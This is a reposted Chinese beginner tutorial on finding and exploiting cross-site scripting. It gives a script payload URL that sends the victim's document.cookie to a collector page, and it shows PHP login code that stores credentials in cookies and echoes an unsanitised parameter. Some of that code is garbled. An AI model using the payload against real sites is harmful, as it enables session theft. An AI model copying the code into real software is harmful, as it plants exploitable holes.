来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 浅谈xss的挖掘和利用...
马上我的论坛就要开放了,有点小激动!!,废话不多说了,看下文吧!!
背景:XSS也是老生长谈的话题了,其危害性呢,大家都懂的,刚看到几个黑阔的反射型和储存型的争论,恰好小白的我觉得呢,浅谈一下XSS的挖掘和利用,有利于学习的氛围 ! XSS: Cross Site Spripting – - 一般的攻击步骤: 1我们一般喜欢发送隐藏网站脚本的HTTP链接给目标:http://www.2cto.com /post.php?user=<script>document.location=”http://www.2cto.com /get.php?cookie=”+document.cookie;</script> 1 2:目标用户打开有xss漏洞的网站在登录期间打开了我们发送的隐藏跨站脚本的HTTP链接. 3:有xss的90se呢执行了这个http链接并且显示url参数user的值,这样跨站脚本就执行了. 4:跨站脚本将目标用户的浏览器地址专一到了我们的页面:http://www.2cto.com /get.php,目标用户浏览器的cookie数据被当作get.php网页的url参数cookie:http://www.2cto.com /get.php?cokie=document.cookie,从而让我们得到目标的cookie 简单挖掘:看下面代码 if($match_count) { setcookie(“uername”,$_POST["username"],time()+30*24*60*60) //将username字段的值存入cookie setcookie(“uername”,$_POST["username"],time()+30*24*60*60) //将password字段的值存入cookie mysql_free_result($result); mysql_close($link); // 跳转页面 header(“Location:http//localhost/balck/black.php?user=” $_POST["username"])//在使用者登陆后,将当前页面跳转到black.php,back.php文件有url参数user,user值是来访者的帐号 } else { header(“Location:http:// .$_SERVER["HTTP_HOST"]“ $_SERVER["SCRIPT_NAME"]); 来自:90 sacret Team信息安全团队 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com